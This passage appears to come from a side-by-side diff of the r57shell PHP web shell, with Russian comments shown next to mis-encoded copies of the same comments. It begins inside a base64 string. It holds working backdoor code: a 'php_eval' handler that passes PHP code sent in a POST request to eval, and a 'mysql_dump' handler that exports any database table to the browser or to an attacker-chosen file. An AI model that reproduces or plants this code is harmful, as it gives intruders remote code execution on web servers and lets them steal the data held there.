8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
ybmV0LS0+";
/*** END base64 ------------------------------------------------------------------------------------------------ */ /*** END base64 ------------------------------------------------------------------------------------------------ */
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~// //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
@ -1468,7 +1450,7 @@ else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump"))
} }
// не зависит от сейфа // íå çàâèñèò îò ñåéôà
if ($_POST['cmd']=="php_eval") if ($_POST['cmd']=="php_eval")
{ {
$eval = @str_replace("<?","",$_POST['php_eval']); $eval = @str_replace("<?","",$_POST['php_eval']);
@ -1476,7 +1458,7 @@ if ($_POST['cmd']=="php_eval")
@eval($eval); @eval($eval);
} }
//~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~// //~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~//
/* mysql дамп */ /* mysql äàìï */
if ($_POST['cmd']=="mysql_dump") if ($_POST['cmd']=="mysql_dump")
{ {
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
@ -1487,7 +1469,7 @@ if ($_POST['cmd']=="mysql_dump")
if(@mysql_select_db($_POST['mysql_db'],$db)) if(@mysql_select_db($_POST['mysql_db'],$db))
{ {
// инфа о дампе // èíôà î äàìïå
$sql1 = "# MySQL dump created by r57shell\r\n"; $sql1 = "# MySQL dump created by r57shell\r\n";
$sql1 .= "# homepage: http://rst.void.ru\r\n"; $sql1 .= "# homepage: http://rst.void.ru\r\n";
$sql1 .= "# ---------------------------------\r\n"; $sql1 .= "# ---------------------------------\r\n";
@ -1496,7 +1478,7 @@ if ($_POST['cmd']=="mysql_dump")
$sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n"; $sql1 .= "# table : ".$_POST['mysql_tbl']."\r\n";
$sql1 .= "# ---------------------------------\r\n\r\n"; $sql1 .= "# ---------------------------------\r\n\r\n";
// получаем текст запроса создания структуры таблицы // ïîëó÷àåì òåêñò çàïðîñà ñîçäàíèÿ ñòðóêòóðû òàáëèöû
$res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
$row = @mysql_fetch_row($res); $row = @mysql_fetch_row($res);
$sql1 .= $row[1]."\r\n\r\n"; $sql1 .= $row[1]."\r\n\r\n";
@ -1504,7 +1486,7 @@ if ($_POST['cmd']=="mysql_dump")
$sql2 = ''; $sql2 = '';
// получаем данные таблицы // ïîëó÷àåì äàííûå òàáëèöû
$res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
if (@mysql_num_rows($res) > 0) { if (@mysql_num_rows($res) > 0) {
while ($row = @mysql_fetch_assoc($res)) { while ($row = @mysql_fetch_assoc($res)) {
@ -1516,7 +1498,7 @@ if ($_POST['cmd']=="mysql_dump")
} }
$sql2 .= "\r\n# ---------------------------------"; $sql2 .= "\r\n# ---------------------------------";
} }
// пишем в файл или выводим в браузер // ïèøåì â ôàéë èëè âûâîäèì â áðàóçåð
if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
else { echo $sql1.$sql2; } else { echo $sql1.$sql2; }
} // end if(@mysql_select_db($_POST['mysql_db'],$db)) } // end if(@mysql_select_db($_POST['mysql_db'],$db))